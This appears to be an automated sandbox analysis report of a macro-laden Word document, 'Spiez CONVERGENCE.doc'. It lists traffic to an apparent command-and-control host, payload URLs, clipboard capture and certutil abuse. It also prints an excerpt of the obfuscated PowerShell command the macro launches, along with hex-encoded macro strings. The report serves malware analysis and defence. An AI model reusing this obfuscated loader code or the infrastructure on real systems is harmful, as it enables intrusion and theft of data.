Source: global trafficHTTP traffic detected: GET /modules/admin.php HTTP/1.1Cookie: session=B43mgpQ4No69GDp3PmklQpTZB5Q=User-Agent: Mozilla/5.0 (WindowsNT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: mysent.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /modules/main.php HTTP/1.1Cookie: session=+6QNckPfZ1I1gtw1brM9/Zms3DU=User-Agent: Mozilla/5.0 (WindowsNT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: mysent.org
Found strings which match to known social media urlsShow sources
Source: powershell.exe, 00000006.00000002.16523512741.0541A000.00000004.sdmp, certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmp, powershell.exe, 0000000E.00000002.16538965868.05250000.00000004.sdmpString found in binary or memory: login.yahoo.com equals www.yahoo.com (Yahoo)
Source: powershell.exe, 00000006.00000002.16523512741.0541A000.00000004.sdmp, certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmp, powershell.exe, 0000000E.00000002.16538965868.05250000.00000004.sdmpString found in binary or memory: login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: powershell.exe, 00000006.00000002.16523512741.0541A000.00000004.sdmp, certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmp, powershell.exe, 0000000E.00000002.16538965868.05250000.00000004.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: mysent.org
Posts data to webserverShow sources
Source: unknownHTTP traffic detected: POST /modules/admin.php HTTP/1.1Cookie: session=B43mgpQ4No69GDp3PmklQpTZB5Q=User-Agent: Mozilla/5.0 (WindowsNT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: mysent.orgContent-Length: 462
Urls found in memory or binary dataShow sources
Source: powershell.exe, 00000006.00000002.16520228938.01B10000.00000004.sdmp, powershell.exe, 0000000E.00000002.16535409082.01C40000.00000004.sdmpString found in binary or memory: file://
Source: powershell.exe, 00000006.00000002.16520228938.01B10000.00000004.sdmp, powershell.exe, 0000000E.00000002.16535409082.01C40000.00000004.sdmpString found in binary or memory: file:///
Source: WINWORD.EXE, 00000001.00000002.16478891432.075B0000.00000004.sdmpString found in binary or memory: file:///C:
Source: mshta.exe, 00000009.00000002.16313457835.004A3000.00000004.sdmpString found in binary or memory: file:///C:/U
Source: mshta.exe, 00000009.00000002.16313564201.004EB000.00000004.sdmp, mshta.exe, 00000009.00000003.16298178452.004E9000.00000004.sdmp, mshta.exe, 00000009.00000003.16301958229.004E9000.00000004.sdmpString found in binary or memory: file:///C:/Users/user/AppData/Local/Microsoft/Windows/Ringtones/libsys.hta...d;2CC
Source: mshta.exe, 00000009.00000002.16313596373.00504000.00000004.sdmpString found in binary or memory: file:///C:/Users/user/AppData/Local/Microsoft/Windows/Ringtones/libsys.hta.lnP
Source: mshta.exe, 00000009.00000002.16313457835.004A3000.00000004.sdmpString found in binary or memory: file:///C:/Users/user/AppData/Local/Microsoft/Windows/Ringtones/libsys.hta85-
Source: mshta.exe, 00000009.00000002.16313509174.004C4000.00000004.sdmpString found in binary or memory: file:///C:/Users/user/AppData/Local/Microsoft/Windows/Ringtones/libsys.htaJ?;
Source: mshta.exe, 00000009.00000003.16300160098.008E2000.00000004.sdmpString found in binary or memory: file:///C:/Users/user/AppData/Local/Microsoft/Windows/Ringtones/libsys.htafile:///C:/Users/luk
Source: mshta.exe, 00000009.00000003.16300337195.004C3000.00000004.sdmpString found in binary or memory: file:///C:/Users/user/AppData/Local/Microsoft/Windows/Ringtones/libsys.htagtonex?:SM
Source: mshta.exe, 00000009.00000003.16300337195.004C3000.00000004.sdmpString found in binary or memory: file:///C:/Users/user/AppData/Local/Microsoft/Windows/Ringtones/libsys.htahta:ZN?;dM
Source: mshta.exe, 00000009.00000002.16313509174.004C4000.00000004.sdmpString found in binary or memory: file:///C:/Users/user/AppData/Local/Microsoft/Windows/Ringtones/libsys.htap?:
Source: mshta.exe, 00000009.00000002.16313509174.004C4000.00000004.sdmpString found in binary or memory: file:///C:/Users/user/AppData/Local/Microsoft/Windows/Ringtones/libsys.htar?;XL
Source: mshta.exe, 00000009.00000003.16300337195.004C3000.00000004.sdmpString found in binary or memory: file:///C:/Users/user/AppData/Local/Microsoft/Windows/Ringtones/libsys.htas?:XL
Source: mshta.exe, 00000009.00000003.16300337195.004C3000.00000004.sdmpString found in binary or memory: file:///C:/Users/user/AppData/Local/Microsoft/Windows/Ringtones/libsys.htas?:XM
Source: mshta.exe, 00000009.00000003.16303244783.004B5000.00000004.sdmpString found in binary or memory: file:///C:/Users/user/AppData/Local/Microsoft/Windows/Ringtones/libsys.htay?:RL
Source: mshta.exe, 00000009.00000002.16313480450.004B8000.00000004.sdmpString found in binary or memory: file:///C:/Users/user/AppData/Local/Microsoft/Windows/Ringtones/libsys.htay?;SL
Source: WINWORD.EXE, 00000001.00000002.16433979410.003E8000.00000004.sdmpString found in binary or memory: file:///C:/Users/user/Desktop/Spiez%20CONVERGENCE.doc
Source: WINWORD.EXE, 00000001.00000002.16433979410.003E8000.00000004.sdmpString found in binary or memory: file:///C:/Users/user/Desktop/Spiez%20CONVERGENCE.doc?_
Source: powershell.exe, 00000006.00000002.16523512741.0541A000.00000004.sdmpString found in binary or memory: file:///C:/Win
Source: powershell.exe, 00000006.00000002.16517628488.00307000.00000004.sdmpString found in binary or memory: file:///C:/Windows/Microsoft.NET/Framework/v2.0.50727/
Source: powershell.exe, 0000000E.00000002.16531613937.00384000.00000004.sdmpString found in binary or memory: file:///C:/Windows/Microsoft.NET/Framework/v2.0.50727/1
Source: powershell.exe, 00000006.00000002.16517720716.00370000.00000004.sdmpString found in binary or memory: file:///C:/Windows/Syste
Source: powershell.exe, 00000006.00000002.16517628488.00307000.00000004.sdmp, powershell.exe, 0000000E.00000002.16531613937.00384000.00000004.sdmpString found in binary or memory: file:///C:/Windows/System32/WindowsPowerShell/v1.0/
Source: powershell.exe, 0000000E.00000002.16531613937.00384000.00000004.sdmpString found in binary or memory: file:///C:/Windows/System32/WindowsPowerShell/v1.0/F
Source: powershell.exe, 0000000E.00000002.16538965868.05250000.00000004.sdmpString found in binary or memory: file:///C:/Windows/System32/WindowsPowerShell/v1.0/System.SecurityFB
Source: powershell.exe, 0000000E.00000002.16531613937.00384000.00000004.sdmpString found in binary or memory: file:///C:/Windows/System32/WindowsPowerShell/v1.0/t
Source: mshta.exe, 00000009.00000002.16313531403.004D3000.00000004.sdmpString found in binary or memory: file:///C:/Windows/System32/cmd.exe
Source: mshta.exe, 00000009.00000002.16313531403.004D3000.00000004.sdmpString found in binary or memory: file:///C:/Windows/System32/cmd.exe5
Source: powershell.exe, 00000006.00000002.16520284469.01B51000.00000004.sdmp, powershell.exe, 0000000E.00000002.16535495356.01C80000.00000004.sdmpString found in binary or memory: http://
Source: powershell.exe, 0000000E.00000002.16538965868.05250000.00000004.sdmpString found in binary or memory: http://U
Source: powershell.exe, 00000006.00000002.16523512741.0541A000.00000004.sdmp, certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmp, powershell.exe, 0000000E.00000002.16538965868.05250000.00000004.sdmpString found in binary or memory: http://crl.comodo.net/UTN-USERFirst-Hardware.crl0q
Source: powershell.exe, 00000006.00000002.16523512741.0541A000.00000004.sdmp, certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmp, powershell.exe, 0000000E.00000002.16538965868.05250000.00000004.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 00000006.00000002.16523512741.0541A000.00000004.sdmp, certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmp, powershell.exe, 0000000E.00000002.16538965868.05250000.00000004.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 00000006.00000002.16523512741.0541A000.00000004.sdmp, certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmp, powershell.exe, 0000000E.00000002.16538965868.05250000.00000004.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 00000006.00000002.16523512741.0541A000.00000004.sdmp, certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmp, powershell.exe, 0000000E.00000002.16538965868.05250000.00000004.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 00000006.00000002.16523512741.0541A000.00000004.sdmp, certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmp, powershell.exe, 0000000E.00000002.16538965868.05250000.00000004.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000006.00000002.16523512741.0541A000.00000004.sdmp, certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmp, powershell.exe, 0000000E.00000002.16538965868.05250000.00000004.sdmpString found in binary or memory: http://crl.usertrust.com/UTN-USERFirst-Object.crl0)
Source: powershell.exe, 0000000E.00000002.16538965868.05250000.00000004.sdmpString found in binary or memory: http://crl0
Source: powershell.exe, 00000006.00000002.16523512741.0541A000.00000004.sdmp, certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmp, powershell.exe, 0000000E.00000002.16538965868.05250000.00000004.sdmpString found in binary or memory: http://crt.comodoca.com/UTNAddTrustServerCA.crt0$
Source: certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
Source: certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?817531a
Source: certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cabuke
Source: powershell.exe, 00000006.00000002.16523512741.0541A000.00000004.sdmp, certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmp, powershell.exe, 0000000E.00000002.16538965868.05250000.00000004.sdmpString found in binary or memory: http://cybertrust.omniroot.com/repository.cfm0
Source: powershell.exe, 00000006.00000003.16257262767.00310000.00000004.sdmp, powershell.exe, 0000000E.00000003.16304535956.00353000.00000004.sdmpString found in binary or memory: http://java.com/
Source: powershell.exe, 00000006.00000003.16257262767.00310000.00000004.sdmp, powershell.exe, 0000000E.00000002.16531613937.00384000.00000004.sdmpString found in binary or memory: http://java.com/help
Source: powershell.exe, 00000006.00000003.16257262767.00310000.00000004.sdmp, powershell.exe, 0000000E.00000003.16304535956.00353000.00000004.sdmpString found in binary or memory: http://java.com/helphttp://java.com/help
Source: powershell.exe, 0000000E.00000002.16531613937.00384000.00000004.sdmpString found in binary or memory: http://java.com/helpi
Source: powershell.exe, 00000006.00000003.16257262767.00310000.00000004.sdmp, powershell.exe, 0000000E.00000003.16304535956.00353000.00000004.sdmpString found in binary or memory: http://java.com/http://java.com/
Source: WINWORD.EXE, 00000001.00000002.16433262957.00250000.00000004.sdmpString found in binary or memory: http://ns.ao6
Source: powershell.exe, 00000006.00000002.16523512741.0541A000.00000004.sdmp, certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmp, powershell.exe, 0000000E.00000002.16538965868.05250000.00000004.sdmpString found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000006.00000002.16523512741.0541A000.00000004.sdmp, certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmp, powershell.exe, 0000000E.00000002.16538965868.05250000.00000004.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 00000006.00000002.16523512741.0541A000.00000004.sdmp, certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmp, powershell.exe, 0000000E.00000002.16538965868.05250000.00000004.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exe, 00000006.00000002.16523512741.0541A000.00000004.sdmp, certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmp, powershell.exe, 0000000E.00000002.16538965868.05250000.00000004.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe, 00000006.00000002.16523512741.0541A000.00000004.sdmp, certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmp, powershell.exe, 0000000E.00000002.16538965868.05250000.00000004.sdmpString found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 00000006.00000002.16523512741.0541A000.00000004.sdmp, certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmp, powershell.exe, 0000000E.00000002.16538965868.05250000.00000004.sdmpString found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe, 00000006.00000002.16523512741.0541A000.00000004.sdmp, certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmp, powershell.exe, 0000000E.00000002.16538965868.05250000.00000004.sdmpString found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000006.00000002.16520284469.01B51000.00000004.sdmp, powershell.exe, 0000000E.00000002.16535495356.01C80000.00000004.sdmpString found in binary or memory: http://schemas.dmtf.org/wbem/wsman/1/cimbinding/associationFilter
Source: powershell.exe, 00000006.00000002.16520284469.01B51000.00000004.sdmp, powershell.exe, 0000000E.00000002.16535495356.01C80000.00000004.sdmpString found in binary or memory: http://schemas.dmtf.org/wbem/wsman/1/wsman/SelectorFilter
Source: powershell.exe, 00000006.00000002.16520284469.01B51000.00000004.sdmp, powershell.exe, 0000000E.00000002.16535495356.01C80000.00000004.sdmpString found in binary or memory: http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd#IdentifyResponseH
Source: WINWORD.EXE, 00000001.00000002.16436592365.014B0000.00000004.sdmp, Spiez CONVERGENCE.docString found in binary or memory: http://www.day.com/dam/1.0
Source: powershell.exe, 00000006.00000002.16523512741.0541A000.00000004.sdmp, certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmp, powershell.exe, 0000000E.00000002.16538965868.05250000.00000004.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 00000006.00000002.16523512741.0541A000.00000004.sdmp, certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmp, powershell.exe, 0000000E.00000002.16538965868.05250000.00000004.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmpString found in binary or memory: http://www.micros)E
Source: powershell.exe, 00000006.00000002.16523512741.0541A000.00000004.sdmp, certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmp, powershell.exe, 0000000E.00000002.16538965868.05250000.00000004.sdmpString found in binary or memory: http://www.public-trust.com/CPS/OmniRoot.html0
Source: powershell.exe, 00000006.00000002.16523512741.0541A000.00000004.sdmp, certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmp, powershell.exe, 0000000E.00000002.16538965868.05250000.00000004.sdmpString found in binary or memory: http://www.public-trust.com/cgi-bin/CRL/2018/cdp.crl0
Source: powershell.exe, 00000006.00000002.16523512741.0541A000.00000004.sdmp, powershell.exe, 0000000E.00000002.16538965868.05250000.00000004.sdmpString found in binary or memory: http://www.usertr
Source: powershell.exe, 00000006.00000002.16523512741.0541A000.00000004.sdmp, certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmp, powershell.exe, 0000000E.00000002.16538965868.05250000.00000004.sdmpString found in binary or memory: http://www.usertrust.com1
Source: cmd.exe, 00000004.00000002.16516367054.00240000.00000004.sdmpString found in binary or memory: https://ae/5r
Source: certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmp, certutil.exe, 00000007.00000003.16275942034.000BC000.00000004.sdmpString found in binary or memory: https://api.
Source: powershell.exe, 00000006.00000002.16520284469.01B51000.00000004.sdmpString found in binary or memory: https://api.onedrive.com
Source: powershell.exe, 00000006.00000002.16517720716.00370000.00000004.sdmp, powershell.exe, 00000006.00000002.16520284469.01B51000.00000004.sdmpString found in binary or memory: https://api.onedrive.com/v1.0/shares/s
Source: powershell.exe, 00000006.00000002.16520284469.01B51000.00000004.sdmpString found in binary or memory: https://api.t
Source: powershell.exe, 00000006.00000002.16520680270.01E47000.00000004.sdmpString found in binary or memory: https://dgdadq.dm.files.1drv.com/y4mLDnW_sdiYZdrKuP_hiNnzpiLk2TKmTpCsB8gTSB6nzLeQ5XI6zgdcTjR3JG3Poj0
Source: powershell.exe, 00000006.00000002.16520680270.01E47000.00000004.sdmpString found in binary or memory: https://dgdadq.dm.files.1drv.com/y4mVzbqwRuj1C7DKiYnOrp-73Jp9DKjpCqzrMtj97lJqJqe60hkQd1iNG47CEm9yn-z
Source: powershell.exe, 00000006.00000002.16520680270.01E47000.00000004.sdmpString found in binary or memory: https://dgdadq.dm.files.1drv.comh%
Source: powershell.exe, 0000000E.00000003.16504702511.05D20000.00000004.sdmpString found in binary or memory: https://myse
Source: powershell.exe, 0000000E.00000003.16504702511.05D20000.00000004.sdmpString found in binary or memory: https://mysent.o
Source: powershell.exe, 0000000E.00000003.16504702511.05D20000.00000004.sdmpString found in binary or memory: https://mysent.oH
Source: powershell.exe, 0000000E.00000002.16535495356.01C80000.00000004.sdmpString found in binary or memory: https://mysent.org
Source: certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmpString found in binary or memory: https://mysent.org/
Source: certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmpString found in binary or memory: https://mysent.org/Q
Source: powershell.exe, 0000000E.00000003.16504702511.05D20000.00000004.sdmpString found in binary or memory: https://mysent.org/access.lo
Source: powershell.exe, 0000000E.00000003.16504702511.05D20000.00000004.sdmpString found in binary or memory: https://mysent.org/access.log.txH
Source: powershell.exe, 0000000E.00000003.16504702511.05D20000.00000004.sdmpString found in binary or memory: https://mysent.org/access.log.txt
Source: certutil.exe, 00000007.00000002.16278676993.000B0000.00000004.sdmp, certutil.exe, 00000007.00000002.16280487798.00810000.00000004.sdmpString found in binary or memory: https://mysent.org/access.log.txtC:
Source: powershell.exe, 0000000E.00000003.16504702511.05D20000.00000004.sdmpString found in binary or memory: https://mysent.org/access.log.txtH
Source: powershell.exe, 0000000E.00000002.16536082417.020E3000.00000004.sdmpString found in binary or memory: https://mysent.org/access.log.txtt
Source: powershell.exe, 0000000E.00000002.16536082417.020E3000.00000004.sdmp, powershell.exe, 0000000E.00000003.16504702511.05D20000.00000004.sdmpString found in binary or memory: https://mysent.org/hpmys.txt
Source: powershell.exe, 0000000E.00000003.16504702511.05D20000.00000004.sdmpString found in binary or memory: https://mysent.org/hpmys.txtH
Source: powershell.exe, 0000000E.00000003.16504702511.05D20000.00000004.sdmpString found in binary or memory: https://mysent.org/hpmys.txtTz
Source: powershell.exe, 0000000E.00000002.16536082417.020E3000.00000004.sdmpString found in binary or memory: https://mysent.org/hpmys.txtt
Source: powershell.exe, 0000000E.00000002.16535495356.01C80000.00000004.sdmpString found in binary or memory: https://mysent.org/modules/admin.php
Source: powershell.exe, 0000000E.00000002.16535495356.01C80000.00000004.sdmp, powershell.exe, 0000000E.00000002.16538965868.05250000.00000004.sdmpString found in binary or memory: https://mysent.org/modules/default.php
Source: powershell.exe, 0000000E.00000002.16540874995.05B4E000.00000004.sdmpString found in binary or memory: https://mysent.org/modules/default.phpd
Source: powershell.exe, 0000000E.00000002.16540874995.05B4E000.00000004.sdmpString found in binary or memory: https://mysent.org/modules/default.phpx
Source: powershell.exe, 0000000E.00000002.16536082417.020E3000.00000004.sdmpString found in binary or memory: https://mysent.org/modules/main.php
Source: powershell.exe, 0000000E.00000002.16535495356.01C80000.00000004.sdmpString found in binary or memory: https://mysent.org:443
Source: powershell.exe, 0000000E.00000002.16535495356.01C80000.00000004.sdmpString found in binary or memory: https://mysent.org:443/modules/admin.php
Source: powershell.exe, 0000000E.00000002.16535495356.01C80000.00000004.sdmpString found in binary or memory: https://mysent.org:443/modules/default.php
Source: powershell.exe, 0000000E.00000002.16536082417.020E3000.00000004.sdmpString found in binary or memory: https://mysent.org:443/modules/default.php8
Source: powershell.exe, 0000000E.00000002.16536082417.020E3000.00000004.sdmpString found in binary or memory: https://mysent.org:443/modules/main.php
Source: powershell.exe, 0000000E.00000002.16535495356.01C80000.00000004.sdmpString found in binary or memory: https://mysent.org:443t
Source: powershell.exe, 00000006.00000002.16523512741.0541A000.00000004.sdmp, certutil.exe, 00000007.00000002.16278810878.00114000.00000004.sdmp, powershell.exe, 0000000E.00000002.16538965868.05250000.00000004.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
Source: Spiez CONVERGENCE.docString found in binary or memory: https://www.labor-spiez.ch/pdf/de/rue/Spiez_Convergence_2014_web.pdf
Source: WINWORD.EXE, 00000001.00000002.16436592365.014B0000.00000004.sdmp, Spiez CONVERGENCE.docString found in binary or memory: https://www.labor-spiez.ch/pdf/de/rue/Spiez_Convergence_2014_web.pdfyX
Source: WINWORD.EXE, 00000001.00000002.16436592365.014B0000.00000004.sdmpString found in binary or memory: https://www.labor-spiez.ch/pdf/en/rue/LaborSpiezConvergence2
Source: Spiez CONVERGENCE.docString found in binary or memory: https://www.labor-spiez.ch/pdf/en/rue/LaborSpiezConvergence2016_02_FINAL.pdf
Source: WINWORD.EXE, 00000001.00000002.16436592365.014B0000.00000004.sdmp, Spiez CONVERGENCE.docString found in binary or memory: https://www.labor-spiez.ch/pdf/en/rue/LaborSpiezConvergence2016_02_FINAL.pdfyX
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49204
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49248
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49247
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49223
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49245
Source: unknownNetwork traffic detected: HTTP traffic on port 49162 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49164 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49183 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49243
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49242
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49164
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49240
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49162
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49183
Source: unknownNetwork traffic detected: HTTP traffic on port 49248 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49204 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49223 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49242 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49240 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49197 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49218
Source: unknownNetwork traffic detected: HTTP traffic on port 49216 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49216
Source: unknownNetwork traffic detected: HTTP traffic on port 49218 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49243 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49177
Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49197
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49196
Source: unknownNetwork traffic detected: HTTP traffic on port 49247 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49194
Source: unknownNetwork traffic detected: HTTP traffic on port 49245 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49196 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49194 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49177 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Creates a window with clipboard capturing capabilitiesShow sources
Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASS

System Summary:

barindex
Document contains an embedded VBA macro which executes code when the document is opened / closedShow sources
Source: Spiez CONVERGENCE.docOLE, VBA macro line: Sub MultiPage1_Layout(ByVal Index As Long)
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function MultiPage1_LayoutName: MultiPage1_Layout
Document contains an embedded VBA macro which may execute processesShow sources
Source: Spiez CONVERGENCE.docOLE, VBA macro line: kHrLt.Run HKfHjGpejTz, XDQaMTq, True
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function ETlScgoBRhHyaCajTIq, API IWshShell3.Run("C:\WinDoWS\sysTEm32\CMD.EXe /c "SeT STI= $iBHrW = [tyPE]("{2}{7}{8}{3}{0}{5}{1}{6}{4}"-f 'ERi','RING,s','COLLE','En','.obJECT','c.DiCtiONARy[st','yStEM','c','tIoNs.g'); .("{0}{1}{2}"-f'S','ET','-iTEM') ("{0}{2}{1}" -f 'VAr','Le:7B1M','iAB') ([tYPe]("{2}{3}{1}{0}" -f'Ock','l','s','crIptb') ) ; $MZS=[tYPE]("{0}{1}"-F 'R','EF') ; ^&("{1}{2}{0}"-f '-iTEM','SE','T') ("{1}{0}{2}"-f'iAbL','vAr','e:04k') ( [tyPe]("{4}{3}{0}{1}{5}{2}"-f '.seRvICEp','o','AnAGeR','.nET','SySTeM','IntM')) ; $Nva1I = [tyPe]("{0}{1}{6}{4}{2}{5}{3}"-F'SY','StE','t.WE','ueST','.ne','BrEQ','m'); .("{2}{0}{1}" -f'E','M','seT-iT') ("V"+"Ar"+"Ia"+"Ble:kmd") ( [tYPe]("{6}{3}{4}{5}{0}{2}{1}"-F'nTIalcA','HE','c','ste','M.n','eT.CRede','sY')) ; $bqvM = [TypE]("{2}{0}{4}{1}{5}{3}"-F'TE','c','syS','ING','m.tExT.en','Od') ;[string[]] ${P`Ath} = .("{2}{3}{0}{1}" -f 'hi','ldItem','Get-','C') -Recurse -LiteralPath "$env:USERPROFILE\\AppData\\Local\\Microsoft" -EName: ETlScgoBRhHyaCajTIq
Document contains an embedded VBA macro with suspicious stringsShow sources
Source: Spiez CONVERGENCE.docOLE, VBA macro line: Set kvSXzSPBAoLVF = CreateObject(czeoPYDHuXBP(rMOBquizQidfuY))
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function MultiPage1_Layout, String createobject: Set kvSXzSPBAoLVF = CreateObject(czeoPYDHuXBP(rMOBquizQidfuY))Name: MultiPage1_Layout
Document contains an embedded VBA with hexadecimal encoded stringsShow sources
Source: Spiez CONVERGENCE.docStream path 'Macros/VBA/ThisDocument' : found hex strings
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function tfNaRhVGiNw, String 529f9d539f9d549f
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function tfNaRhVGiNw, String 9f9d569f9d539f9d579f9d
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function tfNaRhVGiNw, String 877383717589766c77
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function lFqpVWxqJDWI, String 498e494b7f5f469d7882636e9f9f676e75879d424a504a44
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function lFqpVWxqJDWI, String 6b76424f996b906691
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function lFqpVWxqJDWI, String 63494e498a969692955c515183928b50494e498786948b988750494e494363946b4f7a75494e495251958a8394494e4985918f51985350494e4991494e499887494e498795494e4990494e494f869c8191494e4996879096494e4969599072494e4970494b4b5d469d6b789f5f469d86826376839f7d525050557f5d469d86638276839f5f469d86638276639f7d
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function lFqpVWxqJDWI, String 809e504a449d529f9d
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function lFqpVWxqJDWI, String 918792758c6b9b8a668f92858c6f91907b736b6a8b78927b84
Powershell connects to networkShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 131.253.33.213 443Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 188.241.39.220 443
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 204.79.197.213 443Jump to behavior
Very long command line foundShow sources
Source: unknownProcess created: Commandline size = 6530
Source: unknownProcess created: Commandline size = 4760
Source: unknownProcess created: Commandline size = 4760
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: Commandline size = 6530Jump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 4760
Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 4760
Creates files inside the system directoryShow sources
Source: C:\Windows\System32\certutil.exeFile created: C:\Windows\cerEC93.tmp
Creates mutexesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3664
Deletes files inside the Windows folderShow sources
Source: C:\Windows\System32\certutil.exeFile deleted: C:\Windows\cerEC93.tmp
Document contains an ObjectPool stream indicating possible embedded files or OLE objectsShow sources
Source: Spiez CONVERGENCE.docOLE indicator, ObjectPool: true
Document contains embedded VBA macrosShow sources
